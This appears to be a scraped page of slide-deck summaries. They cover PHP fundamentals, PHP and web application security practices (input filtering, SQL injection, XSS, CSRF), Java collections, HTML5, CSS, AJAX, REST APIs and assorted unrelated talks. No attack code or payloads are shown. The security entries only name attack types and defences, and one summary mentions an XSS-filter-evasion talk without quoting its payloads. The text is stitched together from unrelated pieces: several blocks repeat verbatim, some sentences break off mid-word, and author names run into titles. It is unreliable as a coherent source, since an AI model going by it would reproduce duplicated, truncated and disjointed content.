This document discusses various security best practices for PHP applications, including sanitizing user input, validating data, preventing SQL injection and cross-site scripting (XSS), securely storing passwords, using cookies safely, and enabling error logging and reporting. It outlines 12 steps like sanitizing input, validating data types, escaping output, and disabling register_globals to help make PHP applications more secure.
PHP strings allow storing and manipulating text data. A string is a series of characters that can contain any number of characters limited only by available memory. Strings can be written using single quotes, double quotes, or heredoc syntax. Special characters in strings must be escaped using a backslash. PHP provides many built-in functions for working with strings like concatenation, comparison, searching, replacing, extracting, splitting, joining, formatting and more. Regular expressions provide powerful pattern matching capabilities for strings and PHP has functions like preg_match() for searching strings using regex patterns.
PHP is a server-side scripting language used for web development. It allows developers to add dynamic content and functionality to websites. Some key points about PHP from the document:
- PHP code is embedded into HTML and executed on the server to create dynamic web page content. It can be used to connect to databases, process forms, and more.
- PHP has many data types including strings, integers, floats, booleans, arrays, objects, null values and resources. Variables, operators, and conditional statements allow for control flow and data manipulation.
- Common PHP structures include if/else statements for conditional logic, loops like for/while/foreach for iteration, and functions for reusability. Ar
PHP provides built-in connectivity to many databases like MySQL, PostgreSQL, Oracle and more. To connect to a database in PHP, a connection is created using mysql_connect or mysql_pconnect, which may create a persistent connection. The high-level process involves connecting to the database, selecting a database, performing a SQL query, processing the results, and closing the connection. Key functions include mysql_query() to submit queries, mysql_fetch_array() to retrieve rows from the results, and mysql_close() to terminate the connection.
This document discusses HTML forms and how they are used to send data to a server. It explains the GET and POST methods for sending form data, as well as the PHP superglobal variables ($_GET, $_POST, $_REQUEST) that are used to collect the data on the server side. The GET method appends data to the URL and has limitations on size, while the POST method embeds data in the HTTP request body and has no size limits, making it more secure for sensitive data. Both methods create arrays of key-value pairs from the form fields to populate the respective superglobal variables.
Event handling involves responding to user actions like clicking buttons or typing text. Events are generated by sources like buttons or keyboards and handled by listeners that implement specific event listener interfaces. The listener is registered with the source to receive notifications when events occur, then processes the event by implementing callback methods defined in the listener interface. Common types of events include action events, item events, and mouse events.
This document discusses serialization in .NET. Serialization is the process of converting an object graph to a linear sequence of bytes to send over a stream. The document covers basic serialization using attributes, implementing interfaces like ISerializable for custom serialization, and creating custom formatters. Key points are that types must be marked as serializable, an object graph contains referenced objects, and interfaces like ISerializable and IDeserializationEventListener allow customizing the serialization process.
An array is a data structure that stores multiple values in a single variable. There are two main types of arrays in PHP: indexed arrays which use integers as keys and associative arrays which use named keys like strings. The document discusses how to define, access, iterate through and perform operations on arrays in PHP such as counting elements and checking if a key exists.
This document provides information about PHP (Hypertext Preprocessor), including its history, uses, syntax, variables, data types, operators, conditional statements, arrays, loops, functions, and more. Some key points:
- PHP is a widely-used scripting language for building dynamic web pages and applications. It was created in 1995 and runs on web servers.
- PHP code is embedded into HTML files and interpreted by the server before the page is sent to the browser. It allows for the creation of dynamic content.
- PHP is free, runs on most servers, and provides tools for database connectivity, security, and dynamic web page creation. It has advantages over competitors like ASP.
PHP strings allow storing and manipulating text data. A string is a series of characters that can contain any number of characters limited only by available memory. Strings can be written using single quotes, double quotes, or heredoc syntax. Special characters in strings must be escaped using a backslash. PHP provides many built-in functions for working with strings like concatenation, comparison, searching, replacing, extracting, splitting, joining, formatting and more. Regular expressions provide powerful pattern matching capabilities for strings and PHP has functions like preg_match() for searching strings using regex patterns.
PHP is a server-side scripting language used for web development. It allows developers to add dynamic content and functionality to websites. Some key points about PHP from the document:
- PHP code is embedded into HTML and executed on the server to create dynamic web page content. It can be used to connect to databases, process forms, and more.
- PHP has many data types including strings, integers, floats, booleans, arrays, objects, null values and resources. Variables, operators, and conditional statements allow for control flow and data manipulation.
- Common PHP structures include if/else statements for conditional logic, loops like for/while/foreach for iteration, and functions for reusability. Ar
PHP provides built-in connectivity to many databases like MySQL, PostgreSQL, Oracle and more. To connect to a database in PHP, a connection is created using mysql_connect or mysql_pconnect, which may create a persistent connection. The high-level process involves connecting to the database, selecting a database, performing a SQL query, processing the results, and closing the connection. Key functions include mysql_query() to submit queries, mysql_fetch_array() to retrieve rows from the results, and mysql_close() to terminate the connection.
This document discusses HTML forms and how they are used to send data to a server. It explains the GET and POST methods for sending form data, as well as the PHP superglobal variables ($_GET, $_POST, $_REQUEST) that are used to collect the data on the server side. The GET method appends data to the URL and has limitations on size, while the POST method embeds data in the HTTP request body and has no size limits, making it more secure for sensitive data. Both methods create arrays of key-value pairs from the form fields to populate the respective superglobal variables.
Event handling involves responding to user actions like clicking buttons or typing text. Events are generated by sources like buttons or keyboards and handled by listeners that implement specific event listener interfaces. The listener is registered with the source to receive notifications when events occur, then processes the event by implementing callback methods defined in the listener interface. Common types of events include action events, item events, and mouse events.
This document discusses serialization in .NET. Serialization is the process of converting an object graph to a linear sequence of bytes to send over a stream. The document covers basic serialization using attributes, implementing interfaces like ISerializable for custom serialization, and creating custom formatters. Key points are that types must be marked as serializable, an object graph contains referenced objects, and interfaces like ISerializable and IDeserializationEventListener allow customizing the serialization process.
An array is a data structure that stores multiple values in a single variable. There are two main types of arrays in PHP: indexed arrays which use integers as keys and associative arrays which use named keys like strings. The document discusses how to define, access, iterate through and perform operations on arrays in PHP such as counting elements and checking if a key exists.
This document provides information about PHP (Hypertext Preprocessor), including its history, uses, syntax, variables, data types, operators, conditional statements, arrays, loops, functions, and more. Some key points:
- PHP is a widely-used scripting language for building dynamic web pages and applications. It was created in 1995 and runs on web servers.
- PHP code is embedded into HTML files and interpreted by the server before the page is sent to the browser. It allows for the creation of dynamic content.
- PHP is free, runs on most servers, and provides tools for database connectivity, security, and dynamic web page creation. It has advantages over competitors like ASP.
This document provides an introduction and overview of PHP and MySQL. PHP is a programming language used for building dynamic web sites. It allows embedding code within HTML pages to quickly create dynamic content. PHP is processed on the server side to produce HTML results. The document outlines PHP basics like syntax, variables, strings, operators, and conditional statements. It also discusses MySQL, the most popular database used with PHP. The document concludes with exercises for users to practice basic PHP concepts.
( ** Java Certification Training: https://www.edureka.co/java-j2ee-soa-training ** )
This Edureka tutorial on “Java ArrayList” (Java blog series: https://goo.gl/osrGrS) will give you a brief insight about ArrayList in Java and its various constructors and methods along with an example. Through this tutorial, you will learn the following topics:
Collections Framework
Hierarchy of ArrayList
What is ArrayList
Internal Working of ArrayList
Constructors of ArrayList
Constructors Example
ArrayList Methods
Methods Example and Demo
Advantages of ArrayList over Arrays
Check out our Java Tutorial blog series: https://goo.gl/osrGrS
Check out our complete Youtube playlist here: https://goo.gl/CRbgFann
Follow us to never miss an update in the future.
Instagram: https://www.instagram.com/edureka_learning/
Facebook: https://www.facebook.com/edurekaIN/
Twitter: https://twitter.com/edurekain
LinkedIn: https://www.linkedin.com/company/edureka
The document discusses the different types of operators in PHP including arithmetic, assignment, comparison, logical, increment/decrement, and conditional operators. It provides examples of how each operator is used and the output. The key operators covered are addition, subtraction, multiplication, division, modulus, equal, not equal, less than, greater than, logical and, logical or, increment, decrement, and ternary conditional operators.
PHP is a server-side scripting language used to create dynamic web pages. It allows embedding PHP code within HTML pages and interacting with databases. Key elements of PHP include variables, control structures, functions, and sessions. Sessions store user data on the server instead of the client to avoid cookies and allow tracking users across multiple pages.
+ Background & Basics of Web App Security, The HTTP Protocol, Web.
+ Application Insecurities, OWASP Top 10 Vulnerabilities (XSS, SQL Injection, CSRF, etc.)
+ Web App Security Tools (Scanners, Fuzzers, etc), Remediation of Web App
+ Vulnerabilities, Web Application Audits and Risk Assessment.
Web Application Security 101 was conducted by:
Vaibhav Gupta, Vishal Ashtana, Sandeep Singh from Null.
Cookies and sessions allow servers to store and retrieve information about users across multiple page requests that would otherwise be stateless. Cookies store data in the user's browser, while sessions store data on the server. Cookies have limits on size and number, while sessions can store larger objects but expire when the browser closes. PHP provides functions like setcookie() and $_SESSION to easily manage cookies and sessions for maintaining state in web applications.
PHP string function helps us to manipulate string in various ways. There are various types of string function available. Here we discuss some important functions and its use with examples.
The document is a presentation on HTML5 that covers:
- What HTML5 is and why to use it
- New HTML5 structural elements, forms, multimedia elements, and JavaScript APIs
- Demonstrations of HTML5 features like Canvas, SVG, Geolocation, Web Workers, and Web Sockets
- How CSS3 enhances HTML5 with features like media queries, colors, animations and more
- Strategies for implementing HTML5 into websites while maintaining compatibility
This document discusses the collection framework in Java. It provides an overview of the need for collections due to limitations of arrays. It then describes the key interfaces in the collection framework - Collection, List, Set, SortedSet, NavigableSet, Queue, Map, SortedMap, and NavigableMap. For each interface, it provides a brief description of its purpose and characteristics. It explains that collections allow storing heterogeneous data types with variable sizes, unlike arrays.
This document discusses AJAX (Asynchronous JavaScript and XML). It defines AJAX as a group of interrelated web development techniques used on the client-side to create interactive web applications. AJAX allows web pages to be updated asynchronously by exchanging small amounts of data with the server without reloading the entire page. The document outlines the technologies that power AJAX like HTML, CSS, XML, JavaScript, and XMLHttpRequest and how they work together to enable asynchronous updates on web pages.
CSS is used to style and lay out web pages. It allows separation of document content from page layout and design. CSS declarations are made up of selectors and properties. Selectors identify elements on the page and properties set specific styles for those elements, like color, font, size, and layout. CSS rules cascade based on specificity and source, with more specific and inline rules taking precedence over broader and external rules. Inheritance passes down text-based styles by default.
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
Frans Rosén has reported hundreds of security issues using his big white hat since 2012. He have recieved the biggest bounty ever paid on HackerOne, and is one of the highest ranked bug bounty researchers of all time. He's been bug bounty hunting with an iPhone in Thailand, in a penthouse suite in Las Vegas and without even being present using automation. He'll share his stories about how to act when a company's CISO is screaming "SH******T F*CK" in a phone call 02:30 a Friday night, what to do when companies are sending him money without any reason and why Doctors without Borders are trying to hunt him down.
The document discusses various PHP array functions including:
- Array functions like array_combine(), array_count_values(), array_diff() for comparing and merging arrays.
- Sorting arrays with asort(), arsort(), ksort(), krsort().
- Other functions like array_search(), array_sum(), array_rand() for searching, summing and random values.
- Modifying arrays with array_push(), array_pop(), array_shift() for adding/removing elements.
The document provides examples of using each array function in PHP code snippets.
The document discusses various vulnerabilities in web servers and web applications. It covers popular web servers like IIS, Apache, and others. It then discusses attacking vulnerabilities in web servers like sample files, source code disclosure, canonicalization, and buffer overflows. It also discusses vulnerabilities in web applications like cross-site scripting, SQL injection, cross-site request forgery, and HTTP response splitting. It provides examples of exploits and recommendations for countermeasures to secure web servers and applications.
The document summarizes a training presentation on PHP with MySQL. It begins with an introduction to the Center for Electronic Governance (CEG), which was established in 2006 by the Government of Rajasthan to oversee technical education. The presentation then covers the history of PHP, what PHP is, its features, code syntax, components like variables, operators, arrays and functions. It discusses advantages of PHP like being open source and supporting multiple databases. Finally, it provides an overview of why MySQL is a popular database to use with PHP before describing some basic MySQL queries.
Companion slides for Stormpath CTO and Co-Founder Les REST API Security Webinar. This presentation covers all the RESTful best practices learned building the Stormpath APIs. This webinar is full of best practices learned building the Stormpath API and supporting authentication for thousands of projects. Topics Include:
- HTTP Authentication
- Choosing a Security Protocol
- Generating & Managing API Keys
- Authorization & Scopes
- Token Authentication with JSON Web Tokens (JWTs)
- Much more...
Stormpath is a User Management API that reduces development time with instant-on, scalable user infrastructure. Stormpath's intuitive API and expert support make it easy for developers to authenticate, manage and secure users and roles in any application.
This document provides an overview of HTTP and REST APIs. It describes how HTTP allows sending documents over the web using URLs to identify resources and HTTP verbs like GET, PUT, DELETE and POST. It defines common response codes. It explains that REST stands for Representational State Transfer and relies on a stateless, client-server architecture using the HTTP protocol. The key design constraints of REST include having a uniform interface, being resource-based and using representations to manipulate resources with self-descriptive messages. Benefits include statelessness for scalability, cacheability to improve performance, separating clients from servers, and using a layered system with intermediary servers.
In this core java training session, you will learn Collections - Maps. Topics covered in this session are:
• Collections – Maps
• Map Interface
• Map methods
• Mapuse
• Hashmap
• Treemap
• Utilities
For more information about this course visit on this link: https://www.mindsmapped.com/courses/software-development/learn-java-fundamentals-hands-on-training-on-core-java-concepts/
Web application security is an important topic gaining more attention. Sensitive data needs protection not only on servers but also when traveling over networks. Common web application vulnerabilities include cross-site scripting, SQL injection, and cross-site request forgery. Developers should implement measures like encryption, limiting file access and uploads, hiding errors, and using secure sessions to authenticate users. Security requires ongoing consideration to prevent network attacks, unauthorized access, and data theft.
The document provides an overview of basic web security issues and recommendations to address them. It discusses making regular backups and testing restores, using strong and unique passwords that are changed frequently, password protecting directories with .htaccess, keeping software updated, restricting access to sensitive files and data, preventing cross-site scripting attacks, filtering user-submitted data, and using prepared statements to prevent SQL injection. The goal is to increase awareness of common vulnerabilities and how to avoid or lessen exposure to exploits.
This document provides an introduction and overview of PHP and MySQL. PHP is a programming language used for building dynamic web sites. It allows embedding code within HTML pages to quickly create dynamic content. PHP is processed on the server side to produce HTML results. The document outlines PHP basics like syntax, variables, strings, operators, and conditional statements. It also discusses MySQL, the most popular database used with PHP. The document concludes with exercises for users to practice basic PHP concepts.
( ** Java Certification Training: https://www.edureka.co/java-j2ee-soa-training ** )
This Edureka tutorial on “Java ArrayList” (Java blog series: https://goo.gl/osrGrS) will give you a brief insight about ArrayList in Java and its various constructors and methods along with an example. Through this tutorial, you will learn the following topics:
Collections Framework
Hierarchy of ArrayList
What is ArrayList
Internal Working of ArrayList
Constructors of ArrayList
Constructors Example
ArrayList Methods
Methods Example and Demo
Advantages of ArrayList over Arrays
Check out our Java Tutorial blog series: https://goo.gl/osrGrS
Check out our complete Youtube playlist here: https://goo.gl/CRbgFann
Follow us to never miss an update in the future.
Instagram: https://www.instagram.com/edureka_learning/
Facebook: https://www.facebook.com/edurekaIN/
Twitter: https://twitter.com/edurekain
LinkedIn: https://www.linkedin.com/company/edureka
The document discusses the different types of operators in PHP including arithmetic, assignment, comparison, logical, increment/decrement, and conditional operators. It provides examples of how each operator is used and the output. The key operators covered are addition, subtraction, multiplication, division, modulus, equal, not equal, less than, greater than, logical and, logical or, increment, decrement, and ternary conditional operators.
PHP is a server-side scripting language used to create dynamic web pages. It allows embedding PHP code within HTML pages and interacting with databases. Key elements of PHP include variables, control structures, functions, and sessions. Sessions store user data on the server instead of the client to avoid cookies and allow tracking users across multiple pages.
+ Background & Basics of Web App Security, The HTTP Protocol, Web.
+ Application Insecurities, OWASP Top 10 Vulnerabilities (XSS, SQL Injection, CSRF, etc.)
+ Web App Security Tools (Scanners, Fuzzers, etc), Remediation of Web App
+ Vulnerabilities, Web Application Audits and Risk Assessment.
Web Application Security 101 was conducted by:
Vaibhav Gupta, Vishal Ashtana, Sandeep Singh from Null.
Cookies and sessions allow servers to store and retrieve information about users across multiple page requests that would otherwise be stateless. Cookies store data in the user's browser, while sessions store data on the server. Cookies have limits on size and number, while sessions can store larger objects but expire when the browser closes. PHP provides functions like setcookie() and $_SESSION to easily manage cookies and sessions for maintaining state in web applications.
PHP string function helps us to manipulate string in various ways. There are various types of string function available. Here we discuss some important functions and its use with examples.
The document is a presentation on HTML5 that covers:
- What HTML5 is and why to use it
- New HTML5 structural elements, forms, multimedia elements, and JavaScript APIs
- Demonstrations of HTML5 features like Canvas, SVG, Geolocation, Web Workers, and Web Sockets
- How CSS3 enhances HTML5 with features like media queries, colors, animations and more
- Strategies for implementing HTML5 into websites while maintaining compatibility
This document discusses the collection framework in Java. It provides an overview of the need for collections due to limitations of arrays. It then describes the key interfaces in the collection framework - Collection, List, Set, SortedSet, NavigableSet, Queue, Map, SortedMap, and NavigableMap. For each interface, it provides a brief description of its purpose and characteristics. It explains that collections allow storing heterogeneous data types with variable sizes, unlike arrays.
This document discusses AJAX (Asynchronous JavaScript and XML). It defines AJAX as a group of interrelated web development techniques used on the client-side to create interactive web applications. AJAX allows web pages to be updated asynchronously by exchanging small amounts of data with the server without reloading the entire page. The document outlines the technologies that power AJAX like HTML, CSS, XML, JavaScript, and XMLHttpRequest and how they work together to enable asynchronous updates on web pages.
CSS is used to style and lay out web pages. It allows separation of document content from page layout and design. CSS declarations are made up of selectors and properties. Selectors identify elements on the page and properties set specific styles for those elements, like color, font, size, and layout. CSS rules cascade based on specificity and source, with more specific and inline rules taking precedence over broader and external rules. Inheritance passes down text-based styles by default.
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
Frans Rosén has reported hundreds of security issues using his big white hat since 2012. He have recieved the biggest bounty ever paid on HackerOne, and is one of the highest ranked bug bounty researchers of all time. He's been bug bounty hunting with an iPhone in Thailand, in a penthouse suite in Las Vegas and without even being present using automation. He'll share his stories about how to act when a company's CISO is screaming "SH******T F*CK" in a phone call 02:30 a Friday night, what to do when companies are sending him money without any reason and why Doctors without Borders are trying to hunt him down.
The document discusses various PHP array functions including:
- Array functions like array_combine(), array_count_values(), array_diff() for comparing and merging arrays.
- Sorting arrays with asort(), arsort(), ksort(), krsort().
- Other functions like array_search(), array_sum(), array_rand() for searching, summing and random values.
- Modifying arrays with array_push(), array_pop(), array_shift() for adding/removing elements.
The document provides examples of using each array function in PHP code snippets.
The document discusses various vulnerabilities in web servers and web applications. It covers popular web servers like IIS, Apache, and others. It then discusses attacking vulnerabilities in web servers like sample files, source code disclosure, canonicalization, and buffer overflows. It also discusses vulnerabilities in web applications like cross-site scripting, SQL injection, cross-site request forgery, and HTTP response splitting. It provides examples of exploits and recommendations for countermeasures to secure web servers and applications.
The document summarizes a training presentation on PHP with MySQL. It begins with an introduction to the Center for Electronic Governance (CEG), which was established in 2006 by the Government of Rajasthan to oversee technical education. The presentation then covers the history of PHP, what PHP is, its features, code syntax, components like variables, operators, arrays and functions. It discusses advantages of PHP like being open source and supporting multiple databases. Finally, it provides an overview of why MySQL is a popular database to use with PHP before describing some basic MySQL queries.
Companion slides for Stormpath CTO and Co-Founder Les REST API Security Webinar. This presentation covers all the RESTful best practices learned building the Stormpath APIs. This webinar is full of best practices learned building the Stormpath API and supporting authentication for thousands of projects. Topics Include:
- HTTP Authentication
- Choosing a Security Protocol
- Generating & Managing API Keys
- Authorization & Scopes
- Token Authentication with JSON Web Tokens (JWTs)
- Much more...
Stormpath is a User Management API that reduces development time with instant-on, scalable user infrastructure. Stormpath's intuitive API and expert support make it easy for developers to authenticate, manage and secure users and roles in any application.
This document provides an overview of HTTP and REST APIs. It describes how HTTP allows sending documents over the web using URLs to identify resources and HTTP verbs like GET, PUT, DELETE and POST. It defines common response codes. It explains that REST stands for Representational State Transfer and relies on a stateless, client-server architecture using the HTTP protocol. The key design constraints of REST include having a uniform interface, being resource-based and using representations to manipulate resources with self-descriptive messages. Benefits include statelessness for scalability, cacheability to improve performance, separating clients from servers, and using a layered system with intermediary servers.
In this core java training session, you will learn Collections - Maps. Topics covered in this session are:
• Collections – Maps
• Map Interface
• Map methods
• Mapuse
• Hashmap
• Treemap
• Utilities
For more information about this course visit on this link: https://www.mindsmapped.com/courses/software-development/learn-java-fundamentals-hands-on-training-on-core-java-concepts/
Web application security is an important topic gaining more attention. Sensitive data needs protection not only on servers but also when traveling over networks. Common web application vulnerabilities include cross-site scripting, SQL injection, and cross-site request forgery. Developers should implement measures like encryption, limiting file access and uploads, hiding errors, and using secure sessions to authenticate users. Security requires ongoing consideration to prevent network attacks, unauthorized access, and data theft.
The document provides an overview of basic web security issues and recommendations to address them. It discusses making regular backups and testing restores, using strong and unique passwords that are changed frequently, password protecting directories with .htaccess, keeping software updated, restricting access to sensitive files and data, preventing cross-site scripting attacks, filtering user-submitted data, and using prepared statements to prevent SQL injection. The goal is to increase awareness of common vulnerabilities and how to avoid or lessen exposure to exploits.
This document provides an overview of basic web security best practices. It recommends making rolling backups and testing restores, using strong and unique passwords that are changed frequently, password protecting directories with .htaccess, keeping software updated, filtering user inputs to prevent XSS and SQL injection attacks, and avoiding displaying sensitive data in publicly accessible areas. The document also warns about cookies potentially containing malicious code and the risks of iframes.
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
The document summarizes the top 10 security vulnerabilities in web applications according to the Open Web Application Security Project (OWASP). These include injection flaws, cross-site scripting, broken authentication and session management, insecure direct object references, cross-site request forgery, security misconfiguration, insecure cryptographic storage, failure to restrict URL access, insufficient transport layer protection, and unvalidated redirects and forwards. Countermeasures for each vulnerability are also provided.
The document discusses common web application security threats like cross-site request forgery (CSRF), cross-site scripting (XSS), and SQL injections. It provides examples of each threat and explains how Joomla handles them, such as by adding tokens for CSRF protection and escaping user input. The document also covers other attacks like direct code access, register globals being on, and outlines best practices for secure web development like input sanitization and validation.
The document discusses security best practices for PHP and MySQL web applications. It covers securing MySQL configurations, using encryption and access privileges appropriately. For PHP, it recommends filtering all external data, considering potential attacks like SQL injection, XSS, session hijacking and code injection. It provides examples of each attack and methods to prevent them, such as prepared statements, output encoding and regenerating session IDs.
12-security.ppt - PHP and Arabic Language - Indexwebhostingguy
The document discusses PHP security best practices. It emphasizes two golden rules: 1) filter all external input and 2) escape all output. It provides examples of filtering user-submitted data and escaping it before displaying or inserting into a database. It also covers common attacks like SQL injection, session fixation, and cross-site scripting, explaining how to prevent them by following the two golden rules of filtering input and escaping output.
The document discusses PHP security best practices. It emphasizes two golden rules: 1) filter all external input and 2) escape all output. It provides examples of filtering user-submitted data and escaping it before displaying to browsers or inserting into databases. It also covers common attacks like SQL injection, session hijacking, and cross-site scripting, explaining how to prevent them by following the two golden rules of filtering input and escaping output.
The document provides an overview of PHP security topics like input validation, SQL injection, cross-site scripting, code injection, and session security. It discusses the importance of validating all user inputs, escaping data when querying databases, using prepared statements to prevent SQL injection, and regenerating session IDs and validating browser signatures to secure sessions. Specific functions and techniques are presented for preventing vulnerabilities in each area.
This document provides eight rules for writing secure PHP programs:
1. Use proper cryptography and do not invent your own algorithms.
2. Validate all input from external sources before using.
3. Sanitize data sent to databases or other systems to prevent injection attacks.
4. Avoid leaking sensitive information through error messages or other means.
5. Properly manage user sessions to prevent hijacking and ensure users remain authenticated.
6. Enforce authentication and authorization separately using least privilege.
7. Use SSL/TLS to encrypt all authenticated or sensitive communications.
8. Keep security straightforward and avoid relying on obscurity.
Security must be balanced with expense and usability. It should be considered from the initial design phase and involve filtering all external data, validating expected data fields, and carefully handling variables to avoid vulnerabilities like register_globals. Key aspects of security include identifying illegitimate uses, educating yourself, filtering data at multiple points, and logging errors for detection while hiding them from users.
The document provides an overview of various PHP security topics including input validation, cross-site scripting, SQL injection, code injection, session security, and concerns regarding shared hosting environments. It discusses best practices for securing PHP applications such as validating all user inputs, using prepared statements, secure session handling, and restricting file system access.
The document provides an overview of PHP security topics like input validation, cross-site scripting, SQL injection, code injection, and session security. It discusses the importance of validating all user inputs, escaping data when querying databases, using prepared statements to prevent SQL injection, avoiding dynamic code inclusion, and securing PHP sessions to prevent session hijacking. Specific techniques like data filtering, escaping special characters, regenerating session IDs, and validating browser signatures are presented.
The document discusses various security issues and best practices for writing secure PHP applications, including:
1. Validating all user inputs, using prepared statements to prevent SQL injection, and disabling register_globals and magic quotes.
2. Properly configuring PHP error messages, file permissions, and directory listings to prevent information disclosure.
3. Using strong hashing with salts to securely store passwords, disabling dangerous PHP functions, preventing XSS and CSRF attacks, and being generally paranoid about security.
This document provides a summary of steps to secure an Apache and PHP server environment. It discusses locking down the server operating system, hardening Apache configurations, securing PHP settings and development practices, and securely configuring common PHP applications like phpMyAdmin and phpNuke. The key recommendations are to turn off unnecessary services, enable logging and monitoring, lock down filesystem permissions, use modules like mod_security and mod_dosevasive to filter requests, follow secure PHP development best practices, and carefully configure applications following security guidelines.
Table Of Content
The OWASP Top Ten
Invalidated Redirect and Forwards
Security Misconfiguration
Application Fingerprint
Error handling And Logging
Noise
PHP Guidelines
The document discusses various techniques for evading XSS filters, including ModSecurity. It provides examples of how filters like ModSecurity can miss attacks that use encoding, unusual tags, or JavaScript tricks. The filters are shown to be ineffective against attacks that avoid common keywords or use alternative encodings.
The document discusses various cross-site scripting (XSS) attacks and evasion techniques that can bypass common XSS filters like ModSecurity and PHP-IDS. It provides examples of XSS payloads that exploit weaknesses in these filters and evade detection. Recommended defenses include strengthening XSS filters by improving regular expressions and rulesets.
This case study offers details of a project which involved developing an app to allow people to search for physicians/clinics in specified geographic areas. The app allows the users to rate and share reviews about the physicians they visit, and thus offer a reference point for people wanting to visit the same physicians in the future. For more details on our Health IT capabilities, visit: http://www.mindfiresolutions.com/healthcare.htm
The case study offers details of an app developed to enable its users to design healthy and personalized diet schedules, thus enabling them to keep their body weight under check. The app has features to offer customized solutions for the users. Progress can be monitored by referring to information shared in the form of charts and tables. For more details on other fitness/wellness apps developed by us, visit: http://www.mindfiresolutions.com/mHealth-development-services.htm
The document discusses the benefits of meditation for reducing stress and anxiety. Regular meditation practice can help calm the mind and body by lowering heart rate and blood pressure. Studies have shown that meditating for just 10-20 minutes per day can have significant positive impacts on both mental and physical health over time.
The casestudy offers details on an app developed to record and store readings made by three healthcare devices, which are used to measure healthcare vitals of users at remote locations. The App also has provision to generate different types to reports to facilitate subsequent analyses. For more details on our mHealth app development capabilities,
visit: http://www.mindfiresolutions.com/mHealth-development-services.htm
The project describes how a software platform can advance a very contemporary digital marketing technique of using Influencers to promote brands and services. For more details on our IT services, visit: http://www.mindfiresolutions.com/
This is all about details on High Availability of Applications running in Azure. Would cover on fundamentals of High Availability in Azure and discuss in depth on PaaS (High Availability of Web Role and Worker Role).
There was always embedded device in action, but the missing part was connectivity, intelligence, Knowledge from the data it was collecting. The Internet of Things is the new buzz word in trend. There will more embedded devices, more devices with sensor and more control on the physical process. Then we will see there are lots of thing surrounding us in near future. This is very initial phase of the IoT industry. But we have all the tools to experiment and make the things.
Oracle SQL Developer is an Integrated development environment (IDE) for working with SQL in Oracle databases.By the use of this, one can get an easy access to the Database, along with quick and effective SQL queries.
The introduction of Adaptive Layout in iOS 8 is a big paradigm shift for iOS app designers. When designing ones app, one can now create a single layout, which works on all current iOS 8 devices – without crafty platform-specific code!
Auto Layout is one of the most important system that lets one manage layout of ones application user interface. As we know, Apple supports different screen sizes in their devices, therefore managing application user interface becomes difficult.
LINQPad is a software utility targeted at Microsoft .NET development. It is used to interactively query SQL databases using LINQ.Some one planning to use this tool on the work front can refer to this presentation.
WatchKit is an API that extends Apple's development environment for iOS applications to allow apps / notifications to extend to the Apple Watch product. WatchKit is the Objective-C and Swift framework created by Apple to allow third-party developers to create apps for the Apple Watch ecosystem.
Objective-C is how we’ve built Mac and iOS apps for many years. It’s a huge part of the landscape of Apple Development. And, here comes Swift which is only a year old but with lot of promises and features.
Material Design can be simply explained as good design with the innovation and possibility of technology and science. In Material Design lot of new things were introduced like Material Theme, new widgets, custom shadows, vector drawable s and custom animations. This presentation is all about Material Design in Android.
Dukhabandhu Sahoo gave a presentation on OData, an open protocol for building and consuming RESTful APIs. He began by explaining what OData is and how it differs from SOAP and POX. He then discussed OData server platforms, implementations using WCF Data Services and ASP.NET Web API, and OData querying features like operators and methods. The presentation provided an overview of developing and consuming OData services and APIs.
The document discusses Ext JS MVC architecture. It describes the roles of controllers, stores, and models in MVC. Controllers listen to events and reference components. Stores manage model objects and load data via proxies. Models define fields and contain application data. The presenter also covers component access rules for Ext JS such as using Ext.getCmp() globally or container.query() within a container scope.
This presentation is about a basic Overview of Ext JS framework. Covers the discussion on topics like Understanding Ext JS API, Ext JS component Life cycle,Ext JS Components and Events and Ext JS Layouts etc.
The document provides an overview of Spring Security, an authentication and authorization framework for Java web applications. It discusses what Spring Security is and is not, assumptions about the audience's knowledge, and an outline of topics to be covered, including basic and advanced security configurations, user authentication and authorization, security at the view layer, enabling HTTPS, and protecting against CSRF attacks. The presentation aims to introduce Spring Security and demonstrate how to implement common security features.
Dr. Sean Tan, Head of Data Science, Changi Airport Group
Discover how Changi Airport Group (CAG) leverages graph technologies and generative AI to revolutionize their search capabilities. This session delves into the unique search needs of CAG’s diverse passengers and customers, showcasing how graph data structures enhance the accuracy and relevance of AI-generated search results, mitigating the risk of “hallucinations” and improving the overall customer journey.
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!SOFTTECHHUB
As the digital landscape continually evolves, operating systems play a critical role in shaping user experiences and productivity. The launch of Nitrux Linux 3.5.0 marks a significant milestone, offering a robust alternative to traditional systems such as Windows 11. This article delves into the essence of Nitrux Linux 3.5.0, exploring its unique features, advantages, and how it stands as a compelling choice for both casual users and tech enthusiasts.
In his public lecture, Christian Timmerer provides insights into the fascinating history of video streaming, starting from its humble beginnings before YouTube to the groundbreaking technologies that now dominate platforms like Netflix and ORF ON. Timmerer also presents provocative contributions of his own that have significantly influenced the industry. He concludes by looking at future challenges and invites the audience to join in a discussion.
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...SOFTTECHHUB
The choice of an operating system plays a pivotal role in shaping our computing experience. For decades, Microsoft's Windows has dominated the market, offering a familiar and widely adopted platform for personal and professional use. However, as technological advancements continue to push the boundaries of innovation, alternative operating systems have emerged, challenging the status quo and offering users a fresh perspective on computing.
One such alternative that has garnered significant attention and acclaim is Nitrux Linux 3.5.0, a sleek, powerful, and user-friendly Linux distribution that promises to redefine the way we interact with our devices. With its focus on performance, security, and customization, Nitrux Linux presents a compelling case for those seeking to break free from the constraints of proprietary software and embrace the freedom and flexibility of open-source computing.
Sudheer Mechineni, Head of Application Frameworks, Standard Chartered Bank
Discover how Standard Chartered Bank harnessed the power of Neo4j to transform complex data access challenges into a dynamic, scalable graph database solution. This keynote will cover their journey from initial adoption to deploying a fully automated, enterprise-grade causal cluster, highlighting key strategies for modelling organisational changes and ensuring robust disaster recovery. Learn how these innovations have not only enhanced Standard Chartered Bank’s data infrastructure but also positioned them as pioneers in the banking sector’s adoption of graph technology.
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024Neo4j
Neha Bajwa, Vice President of Product Marketing, Neo4j
Join us as we explore breakthrough innovations enabled by interconnected data and AI. Discover firsthand how organizations use relationships in data to uncover contextual insights and solve our most pressing challenges – from optimizing supply chains, detecting fraud, and improving customer experiences to accelerating drug discoveries.
